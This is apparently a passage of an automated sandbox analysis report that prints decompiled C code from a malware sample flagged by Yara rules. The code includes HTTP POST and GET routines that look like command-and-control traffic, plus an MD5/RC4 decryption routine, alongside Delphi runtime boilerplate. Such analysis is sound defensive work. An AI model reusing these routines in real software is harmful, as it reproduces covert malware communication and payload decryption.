                          • Instruction Fuzzy Hash: C4518771A4025C7FFF22D6A4DC46FEF7BBD9B04744F8401A1A604E6581E7749A44CF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 100%
                          			E042D28D0(char* _a4, CHAR* _a8, void* _a12, intOrPtr _a16, DWORD* _a20) {
                          				void* _v8;
                          				void* _v12;
                          				signed short _v16;
                          				signed int _v20;
                          				void _v24;
                          				void _v28;
                          				void* _v32;
                          				int _v36;
                          				long _v40;
                          				int _v44;
                          				int _v48;
                          				long _v52;
                          				intOrPtr _v64;
                          				char* _v68;
                          				signed short _v88;
                          				intOrPtr _v92;
                          				char* _v96;
                          				long _v100;
                          				void* _v112;
                          				char _v372;
                          				char _v632;
                          				int _t90;
                          				void* _t145;
                          
                          				E042D14A0( &_v112, 0, 0x3c);
                          				_v112 = 0x3c;
                          				_v96 =  &_v372;
                          				_v92 = 0x104;
                          				_v68 =  &_v632;
                          				_v64 = 0x104;
                          				_v36 = 0;
                          				_v44 = lstrlenA("Content-Type: application/x-www-form-urlencoded");
                          				 *((char*)(_t145 + 0xfffffffffffffe90)) = 0;
                          				 *((char*)(_t145 + 0xfffffffffffffd8c)) = 0;
                          				if(_a8 != 0) {
                          					_v36 = lstrlenA(_a8);
                          				}
                          				if(InternetCrackUrlA(_a4, 0, 0,  &_v112) != 0) {
                          					if(_v100 == 0) {
                          						_v100 = 3;
                          					}
                          					if(_v100 == 3 || _v100 == 4) {
                          						_v32 = E042D24F0();
                          						if(_v32 != 0) {
                          							_v16 = _v88;
                          							_v20 = 0x84080100;
                          							if(_v100 == 4) {
                          								_v20 = _v20 | 0x00803000;
                          							}
                          							_v12 = InternetConnectA(_v32,  &_v372, _v16 & 0x0000ffff, 0, 0, 3, 0, 0);
                          							if(_v12 != 0) {
                          								_v8 = HttpOpenRequestA(_v12, "POST",  &_v632, 0, 0, 0x42d7048, _v20, 0);
                          								if(_v8 != 0) {
                          									if(_v100 == 4) {
                          										_v40 = 4;
                          										InternetQueryOptionA(_v8, 0x1f,  &_v24,  &_v40);
                          										_v24 = _v24 | 0x00001100;
                          										InternetSetOptionA(_v8, 0x1f,  &_v24, 4);
                          									}
                          									_t90 = HttpSendRequestA(_v8, "Content-Type: application/x-www-form-urlencoded", _v44, _a8, _v36); // executed
                          									_v48 = _t90;
                          									_v28 = 0;
                          									if(_v48 == 1) {
                          										_v52 = 4;
                          										HttpQueryInfoA(_v8, 0x20000013,  &_v28,  &_v52, 0);
                          										if(_v28 == 0xc8 && _a12 != 0) {
                          											if(InternetReadFile(_v8, _a12, _a16 - 1, _a20) == 0 ||  *_a20 <= 0) {
                          												 *_a20 = 0;
                          											} else {
                          												 *((char*)(_a12 +  *_a20)) = 0;
                          											}
                          										}
                          									}
                          									InternetCloseHandle(_v8);
                          									InternetCloseHandle(_v12);
                          									if(_v28 != 0xc8) {
                          										return 0;
                          									} else {
                          										return 1;
                          									}
                          								}
                          								InternetCloseHandle(_v12);
                          								return 0;
                          							} else {
                          								return 0;
                          							}
                          						}
                          						return 0;
                          					} else {
                          						return 0;
                          					}
                          				}
                          				return 0;
                          			}



























                          APIs
                          • lstrlenA.KERNEL32(Content-Type: application/x-www-form-urlencoded), ref: 042D291C
                          • lstrlenA.KERNEL32(00000000), ref: 042D294F
                            • Part of subcall function 042D24F0: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 042D2509
                          • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 042D2964
                          • InternetConnectA.WININET(00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000), ref: 042D29E5
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrlen$ConnectCrackOpen
                          • String ID: <$Content-Type: application/x-www-form-urlencoded$POST
                          • API String ID: 4167639401-2842678110
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 147 27d5868-27d5899 lstrcpyn GetThreadLocale GetLocaleInfoA 148 27d589f-27d58a3 147->148 149 27d5982-27d5989 147->149 150 27d58af-27d58c5 lstrlen 148->150 151 27d58a5-27d58a9 148->151 152 27d58c8-27d58cb 150->152 151->149 151->150 153 27d58cd-27d58d5 152->153 154 27d58d7-27d58df 152->154 153->154 155 27d58c7 153->155 154->149 156 27d58e5-27d58ea 154->156 155->152 157 27d58ec-27d5912 lstrcpyn LoadLibraryExA 156->157 158 27d5914-27d5916 156->158 157->158 158->149 159 27d5918-27d591c 158->159 159->149 160 27d591e-27d594e lstrcpyn LoadLibraryExA 159->160 160->149 161 27d5950-27d5980 lstrcpyn LoadLibraryExA 160->161 161->149
                          C-Code - Quality: 61%
                          			E027D5868() {
                          				void* _t28;
                          				void* _t30;
                          				struct HINSTANCE__* _t36;
                          				struct HINSTANCE__* _t42;
                          				char* _t51;
                          				void* _t52;
                          				struct HINSTANCE__* _t59;
                          				void* _t61;
                          
                          				_push(0x105);
                          				_push( *((intOrPtr*)(_t61 - 4)));
                          				_push(_t61 - 0x11d);
                          				L027D1354();
                          				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
                          				_t59 = 0;
                          				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
                          					L14:
                          					return _t59;
                          				} else {
                          					_t28 = _t61 - 0x11d;
                          					_push(_t28);
                          					L027D135C();
                          					_t51 = _t28 + _t61 - 0x11d;
                          					L5:
                          					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
                          						_t51 = _t51 - 1;
                          						goto L5;
                          					}
                          					_t30 = _t61 - 0x11d;
                          					if(_t51 != _t30) {
                          						_t52 = _t51 + 1;
                          						if( *((char*)(_t61 - 0x12)) != 0) {
                          							_push(0x105 - _t52 - _t30);
                          							_push(_t61 - 0x12);
                          							_push(_t52);
                          							L027D1354();
                          							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
                          						}
                          						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
                          							_push(0x105 - _t52 - _t61 - 0x11d);
                          							_push(_t61 - 0xd);
                          							_push(_t52);
                          							L027D1354();
                          							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                          							_t59 = _t36;
                          							if(_t59 == 0) {
                          								 *((char*)(_t61 - 0xb)) = 0;
                          								_push(0x105 - _t52 - _t61 - 0x11d);
                          								_push(_t61 - 0xd);
                          								_push(_t52);
                          								L027D1354();
                          								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                          								_t59 = _t42;
                          							}
                          						}
                          					}
                          					goto L14;
                          				}
                          			}












                          APIs
                          • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 027D5878
                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 027D5885
                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 027D588B
                          • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 027D58B6
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027D58FD
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027D590D
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027D5935
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027D5945
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 027D596B
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 027D597B
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                          • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                          • API String ID: 1599918012-3917250287
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 162 42d2cd0-42d2d10 CryptAcquireContextA 163 42d2d1c-42d2d35 CryptCreateHash 162->163 164 42d2d12 162->164 166 42d2d3b-42d2d51 CryptHashData 163->166 167 42d2d37 163->167 165 42d2da0-42d2da4 164->165 168 42d2db7-42d2dbb 165->168 169 42d2da6-42d2db0 CryptDestroyHash 165->169 170 42d2d57-42d2d74 CryptDeriveKey 166->170 171 42d2d53 166->171 167->165 174 42d2dbd-42d2dc7 CryptDestroyKey 168->174 175 42d2dce-42d2dd2 168->175 169->168 172 42d2d7a-42d2d94 CryptDecrypt 170->172 173 42d2d76 170->173 171->165 176 42d2d9a-42d2d9d 172->176 177 42d2d96 172->177 173->165 174->175 178 42d2dd4-42d2de0 CryptReleaseContext 175->178 179 42d2de7-42d2ded 175->179 176->165 177->165 178->179
                          C-Code - Quality: 37%
                          			E042D2CD0(BYTE* _a4, int _a8, intOrPtr _a12, intOrPtr _a16) {
                          				int _v8;
                          				long* _v12;
                          				long* _v16;
                          				int _v20;
                          				intOrPtr _v24;
                          				int _t32;
                          				intOrPtr _t33;
                          				long* _t35;
                          
                          				_v16 = 0;
                          				_v8 = 0;
                          				_v12 = 0;
                          				_v20 = 0;
                          				_v24 = 0x280011;
                          				_t32 = CryptAcquireContextA( &_v12, 0, 0, 1, 0xf0000000); // executed
                          				if(_t32 != 0) {
                          					__imp__CryptCreateHash(_v12, 0x8004, 0, 0,  &_v8); // executed
                          					if(_t32 != 0) {
                          						_t33 = _a16;
                          						__imp__CryptHashData(_v8, _a12, _t33, 0);
                          						if(_t33 != 0) {
                          							_t35 = _v12;
                          							__imp__CryptDeriveKey(_t35, 0x6801, _v8, _v24,  &_v16); // executed
                          							if(_t35 != 0) {
                          								if(CryptDecrypt(_v16, 0, 1, 0, _a4,  &_a8) != 0) {
                          									_v20 = _a8;
                          								}
                          							}
                          						}
                          					}
                          				}
                          				if(_v8 != 0) {
                          					__imp__CryptDestroyHash(_v8);
                          					_v8 = 0;
                          				}
                          				if(_v16 != 0) {
                          					CryptDestroyKey(_v16);
                          					_v16 = 0;
                          				}
                          				if(_v12 != 0) {
                          					CryptReleaseContext(_v12, 0);
                          					_v12 = 0;
                          				}
                          				return _v20;
                          			}












                          APIs
                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000), ref: 042D2D08
                          • CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,00000000), ref: 042D2D2D
                          • CryptDestroyHash.ADVAPI32(00000000), ref: 042D2DAA
                          • CryptDestroyKey.ADVAPI32(00000000), ref: 042D2DC1
                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 042D2DDA
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$ContextDestroyHash$AcquireCreateRelease
                          • String ID:
                          • API String ID: 1222261195-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 82%
                          			E027EE2C0(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
                          				CHAR* _v8;
                          				void* __ebx;
                          				void* __ecx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				struct HRSRC__* _t12;
                          				void* _t18;
                          				void* _t23;
                          				CHAR* _t24;
                          				void* _t25;
                          				struct HRSRC__* _t29;
                          				void* _t30;
                          				struct HINSTANCE__* _t31;
                          				void* _t32;
                          
                          				_v8 = _t24;
                          				_t31 = __edx;
                          				_t23 = __eax;
                          				_t12 = FindResourceA(__edx, _v8, _a4); // executed
                          				_t29 = _t12;
                          				 *(_t23 + 0x10) = _t29;
                          				_t33 = _t29;
                          				if(_t29 == 0) {
                          					E027EE250(_t23, _t24, _t29, _t31, _t33, _t32);
                          					_pop(_t24);
                          				}
                          				_t5 = _t23 + 0x10; // 0x27ee364
                          				_t30 = LoadResource(_t31,  *_t5);
                          				 *(_t23 + 0x14) = _t30;
                          				_t34 = _t30;
                          				if(_t30 == 0) {
                          					E027EE250(_t23, _t24, _t30, _t31, _t34, _t32);
                          				}
                          				_t7 = _t23 + 0x10; // 0x27ee364
                          				_push(SizeofResource(_t31,  *_t7));
                          				_t8 = _t23 + 0x14; // 0x27ee028
                          				_t18 = LockResource( *_t8);
                          				_pop(_t25);
                          				return E027EDFE8(_t23, _t25, _t18);
                          			}



















                          APIs
                          • FindResourceA.KERNEL32(027D0000,?,?), ref: 027EE2D7
                          • LoadResource.KERNEL32(027D0000,027EE364,027E93B4,027D0000,00000001,00000000,?,027EE230,?,?,?,?,?,028615EE,00001205,gyy), ref: 027EE2F1
                          • SizeofResource.KERNEL32(027D0000,027EE364,027D0000,027EE364,027E93B4,027D0000,00000001,00000000,?,027EE230,?,?,?,?,?,028615EE), ref: 027EE30B
                          • LockResource.KERNEL32(027EE028,00000000,027D0000,027EE364,027D0000,027EE364,027E93B4,027D0000,00000001,00000000,?,027EE230,?), ref: 027EE315
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Resource$FindLoadLockSizeof
                          • String ID:
                          • API String ID: 3473537107-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E042D1390(long _a4) {
                          				void* _t4;
                          				void* _t6;
                          
                          				if( *0x42d715c == 0) {
                          					 *0x42d715c = GetProcessHeap();
                          				}
                          				if( *0x42d715c == 0) {
                          					return 0;
                          				} else {
                          					_t6 =  *0x42d715c; // 0x28f0000
                          					_t4 = RtlAllocateHeap(_t6, 0, _a4); // executed
                          					return _t4;
                          				}
                          			}






                          APIs
                          • GetProcessHeap.KERNEL32(?,042D1886,00100000), ref: 042D139C
                          • RtlAllocateHeap.NTDLL(028F0000,00000000,042D1886,?,042D1886,00100000), ref: 042D13BD
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcess
                          • String ID:
                          • API String ID: 1357844191-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 77%
                          			E02838ED0(void* __ecx, void* __edi, void* __esi) {
                          				intOrPtr _t6;
                          				intOrPtr _t8;
                          				intOrPtr _t10;
                          				intOrPtr _t12;
                          				intOrPtr _t14;
                          				void* _t16;
                          				void* _t17;
                          				intOrPtr _t20;
                          				intOrPtr _t21;
                          				intOrPtr _t22;
                          				intOrPtr _t23;
                          				intOrPtr _t28;
                          
                          				_t25 = __esi;
                          				_t17 = __ecx;
                          				_push(_t28);
                          				_push(0x2838f56);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t28;
                          				 *0x2865b9c =  *0x2865b9c - 1;
                          				if( *0x2865b9c < 0) {
                          					 *0x2865b98 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
                          					_t31 =  *0x2865b98;
                          					E02838C80(_t16, __edi,  *0x2865b98);
                          					_t6 =  *0x28290fc; // 0x2829148
                          					E027EA814(_t6, _t16, _t17,  *0x2865b98);
                          					_t8 =  *0x28290fc; // 0x2829148
                          					E027EA8B4(_t8, _t16, _t17, _t31);
                          					_t21 =  *0x28290fc; // 0x2829148
                          					_t10 =  *0x281fefc; // 0x281ff48
                          					E027EA860(_t10, _t16, _t21, __esi, _t31);
                          					_t22 =  *0x28290fc; // 0x2829148
                          					_t12 =  *0x280fa10; // 0x280fa5c
                          					E027EA860(_t12, _t16, _t22, __esi, _t31);
                          					_t23 =  *0x28290fc; // 0x2829148
                          					_t14 =  *0x280fbcc; // 0x280fc18
                          					E027EA860(_t14, _t16, _t23, _t25, _t31);
                          				}
                          				_pop(_t20);
                          				 *[fs:eax] = _t20;
                          				_push(0x2838f5d);
                          				return 0;
                          			}
















                          APIs
                          • GetVersion.KERNEL32(00000000,02838F56), ref: 02838EEA
                            • Part of subcall function 02838C80: GetCurrentProcessId.KERNEL32(?,00000000,02838DF8), ref: 02838CA1
                            • Part of subcall function 02838C80: GlobalAddAtomA.KERNEL32(00000000), ref: 02838CD4
                            • Part of subcall function 02838C80: GetCurrentThreadId.KERNEL32 ref: 02838CEF
                            • Part of subcall function 02838C80: GlobalAddAtomA.KERNEL32(00000000), ref: 02838D25
                            • Part of subcall function 02838C80: RegisterClipboardFormatA.USER32(00000000), ref: 02838D3B
                            • Part of subcall function 02838C80: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,02838DF8), ref: 02838DBF
                            • Part of subcall function 02838C80: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 02838DD0
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                          • String ID:
                          • API String ID: 3775504709-0
                          • Opcode ID: 0bc254eba02334ef7dc36b75a804ccdfdaf775d7ac590fa51e19ce1371687533
                          • Instruction ID: d2417c79c150777cc50850b3a5de11832d3f9c752946885f019167cf1cecc3a6
                          • Opcode Fuzzy Hash: 0bc254eba02334ef7dc36b75a804ccdfdaf775d7ac590fa51e19ce1371687533
                          • Instruction Fuzzy Hash: F1F0447C984145CFEB23EB25F8974153366EB49700762CC31E511C3AD4DA3858268EE4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 89%
                          			E042D1FE0(char* _a4, void* _a8, long _a12, DWORD** _a16) {
                          				void* _v8;
                          				long _v12;
                          				void* _v16;
                          				signed short _v20;
                          				signed int _v24;
                          				void _v28;
                          				void _v32;
                          				void* _v36;
                          				long _v40;
                          				long _v44;
                          				int _v48;
                          				intOrPtr _v60;
                          				char* _v64;
                          				signed short _v84;
                          				intOrPtr _v88;
                          				char* _v92;
                          				long _v96;
                          				void* _v108;
                          				char _v368;
                          				char _v628;
                          				int _t79;
                          				void* _t80;
                          				void* _t83;
                          				void* _t141;
                          
                          				E042D14A0( &_v108, 0, 0x3c);
                          				_v108 = 0x3c;
                          				_v92 =  &_v368;
                          				_v88 = 0x104;
                          				_v64 =  &_v628;
                          				_v60 = 0x104;
                          				 *((char*)(_t141 + 0xfffffffffffffe94)) = 0;
                          				 *((char*)(_t141 + 0xfffffffffffffd90)) = 0;
                          				_t79 = InternetCrackUrlA(_a4, 0, 0,  &_v108); // executed
                          				if(_t79 != 0) {
                          					if(_v96 == 0) {
                          						_v96 = 3;
                          					}
                          					if(_v96 == 3 || _v96 == 4) {
                          						_t80 = E042D24F0(); // executed
                          						_v36 = _t80;
                          						if(_v36 != 0) {
                          							_v20 = _v84;
                          							_v24 = 0x84080100;
                          							if(_v96 == 4) {
                          								_v24 = _v24 | 0x00803000;
                          							}
                          							_t83 = InternetConnectA(_v36,  &_v368, _v20 & 0x0000ffff, 0, 0, 3, 0, 1); // executed
                          							_v16 = _t83;
                          							if(_v16 != 0) {
                          								_v8 = HttpOpenRequestA(_v16, "GET",  &_v628, 0, 0, 0x42d7050, _v24, 1);
                          								if(_v8 != 0) {
                          									if(_v96 == 4) {
                          										_v40 = 4;
                          										InternetQueryOptionA(_v8, 0x1f,  &_v28,  &_v40);
                          										_v28 = _v28 | 0x00001100;
                          										InternetSetOptionA(_v8, 0x1f,  &_v28, 4);
                          									}
                          									HttpSendRequestA(_v8, 0, 0, 0, 0);
                          									_v32 = 0;
                          									_v44 = 4;
                          									HttpQueryInfoA(_v8, 0x20000013,  &_v32,  &_v44, 0);
                          									if(_v32 != 0xc8 || _a8 == 0) {
                          										L26:
                          										InternetCloseHandle(_v8); // executed
                          										InternetCloseHandle(_v16);
                          										if(_v32 != 0xc8) {
                          											return 0;
                          										}
                          										return 1;
                          									} else {
                          										 *_a16 = 0;
                          										while(1 != 0) {
                          											_v48 = InternetReadFile(_v8, _a8, _a12,  &_v12);
                          											if(_v48 != 1 || _v12 <= 0) {
                          												goto L26;
                          											} else {
                          												_a8 = _a8 + _v12;
                          												_a12 = _a12 - _v12;
                          												 *_a16 =  *_a16 + _v12;
                          												continue;
                          											}
                          										}
                          										goto L26;
                          									}
                          								}
                          								InternetCloseHandle(_v16);
                          								return 0;
                          							} else {
                          								return 0;
                          							}
                          						}
                          						return 0;
                          					} else {
                          						return 0;
                          					}
                          				}
                          				return 0;
                          			}

                          APIs
                          • InternetCrackUrlA.WININET(042D1AD9,00000000,00000000,0000003C), ref: 042D204C
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternet
                          • String ID: <$GET
                          • API String ID: 1381609488-427699995
                          • Opcode ID: 5e41b86bd99b2a17133c77d2b327c3618a2cc0e2505757e44bf3fe79c26b8090
                          • Instruction ID: 31b5ba0e61ee95beb94ffa2d6675933e973740188f750f85d02d3e69b39735bf
                          • Opcode Fuzzy Hash: 5e41b86bd99b2a17133c77d2b327c3618a2cc0e2505757e44bf3fe79c26b8090
                          • Instruction Fuzzy Hash: 6C713D74E10209EFEB14DFD4D849BEEB7B4FB48701F108599E611AB284E7B5AA44CF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 86%
                          			E02838C80(void* __ebx, void* __edi, void* __eflags) {
                          				char _v8;
                          				char _v12;
                          				char _v16;
                          				char _v20;
                          				char _v24;
                          				long _v28;
                          				char _v32;
                          				char _v36;
                          				intOrPtr _t25;
                          				short _t27;
                          				char _t29;
                          				intOrPtr _t35;
                          				intOrPtr _t38;
                          				intOrPtr _t47;
                          				intOrPtr _t49;
                          				intOrPtr* _t50;
                          				intOrPtr _t53;
                          				struct HINSTANCE__* _t63;
                          				intOrPtr* _t78;
                          				intOrPtr* _t80;
                          				intOrPtr _t83;
                          				void* _t87;
                          
                          				_v20 = 0;
                          				_v8 = 0;
                          				_push(_t87);
                          				_push(0x2838df8);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t87 + 0xffffffe0;
                          				_v16 = GetCurrentProcessId();
                          				_v12 = 0;
                          				E027D9264("Delphi%.8X", 0,  &_v16,  &_v8);
                          				E027D413C(0x2865ba4, _v8);
                          				_t25 =  *0x2865ba4; // 0x41d10ac
                          				_t27 = GlobalAddAtomA(E027D45A8(_t25)); // executed
                          				 *0x2865ba0 = _t27;
                          				_t29 =  *0x2865668; // 0x27d0000
                          				_v36 = _t29;
                          				_v32 = 0;
                          				_v28 = GetCurrentThreadId();
                          				_v24 = 0;
                          				E027D9264("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
                          				E027D413C(0x2865ba8, _v20);
                          				_t35 =  *0x2865ba8; // 0x41d10c8
                          				 *0x2865ba2 = GlobalAddAtomA(E027D45A8(_t35));
                          				_t38 =  *0x2865ba8; // 0x41d10c8
                          				 *0x2865bac = RegisterClipboardFormatA(E027D45A8(_t38));
                          				 *0x2865be4 = E027EB488(1);
                          				E02838884();
                          				 *0x2865b94 = E028386A0(1, 1);
                          				_t47 = E0281B694(0, 1, __edi);
                          				_t78 =  *0x2864774; // 0x2865b5c
                          				 *_t78 = _t47;
                          				_t49 = E0281CD08(0, 1);
                          				_t80 =  *0x28645d4; // 0x2865b58
                          				 *_t80 = _t49;
                          				_t50 =  *0x28645d4; // 0x2865b58
                          				E0281EC60( *_t50, 1); // executed
                          				_t53 =  *0x2828054; // 0x2828058
                          				E027EA9A0(_t53, 0x282a7d0, 0x282a7e0);
                          				_t63 = GetModuleHandleA("USER32");
                          				if(_t63 != 0) {
                          					 *0x2863eb8 = GetProcAddress(_t63, "AnimateWindow");
                          				}
                          				_pop(_t83);
                          				 *[fs:eax] = _t83;
                          				_push(0x2838dff);
                          				E027D40E8( &_v20);
                          				return E027D40E8( &_v8);
                          			}

                          APIs
                          • GetCurrentProcessId.KERNEL32(?,00000000,02838DF8), ref: 02838CA1
                          • GlobalAddAtomA.KERNEL32(00000000), ref: 02838CD4
                          • GetCurrentThreadId.KERNEL32 ref: 02838CEF
                          • GlobalAddAtomA.KERNEL32(00000000), ref: 02838D25
                          • RegisterClipboardFormatA.USER32(00000000), ref: 02838D3B
                            • Part of subcall function 027EB488: RtlInitializeCriticalSection.KERNEL32(027E89FC,?,?,027F4BA5,00000000,027F4BC9), ref: 027EB4A7
                            • Part of subcall function 02838884: SetErrorMode.KERNEL32(00008000), ref: 0283889D
                            • Part of subcall function 02838884: GetModuleHandleA.KERNEL32(USER32,00000000,028389EA,?,00008000), ref: 028388C1
                            • Part of subcall function 02838884: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 028388CE
                            • Part of subcall function 02838884: LoadLibraryA.KERNEL32(imm32.dll,00000000,028389EA,?,00008000), ref: 028388EA
                            • Part of subcall function 02838884: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 0283890C
                            • Part of subcall function 02838884: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 02838921
                            • Part of subcall function 02838884: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 02838936
                            • Part of subcall function 02838884: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 0283894B
                            • Part of subcall function 02838884: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 02838960
                            • Part of subcall function 02838884: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 02838975
                            • Part of subcall function 02838884: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0283898A
                            • Part of subcall function 02838884: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0283899F
                            • Part of subcall function 02838884: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 028389B4
                            • Part of subcall function 02838884: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 028389C9
                            • Part of subcall function 02838884: SetErrorMode.KERNEL32(?,028389F1,00008000), ref: 028389E4
                            • Part of subcall function 0281B694: GetKeyboardLayout.USER32(00000000), ref: 0281B6E8
                            • Part of subcall function 0281B694: GetDC.USER32(00000000), ref: 0281B74F
                            • Part of subcall function 0281B694: GetDeviceCaps.GDI32(?,0000005A), ref: 0281B75D
                            • Part of subcall function 0281B694: ReleaseDC.USER32(00000000,?), ref: 0281B76E
                            • Part of subcall function 0281CD08: LoadIconA.USER32(00000000,MAINICON), ref: 0281CE21
                            • Part of subcall function 0281CD08: GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000,MAINICON), ref: 0281CE60
                            • Part of subcall function 0281CD08: OemToCharA.USER32(?,?), ref: 0281CE73
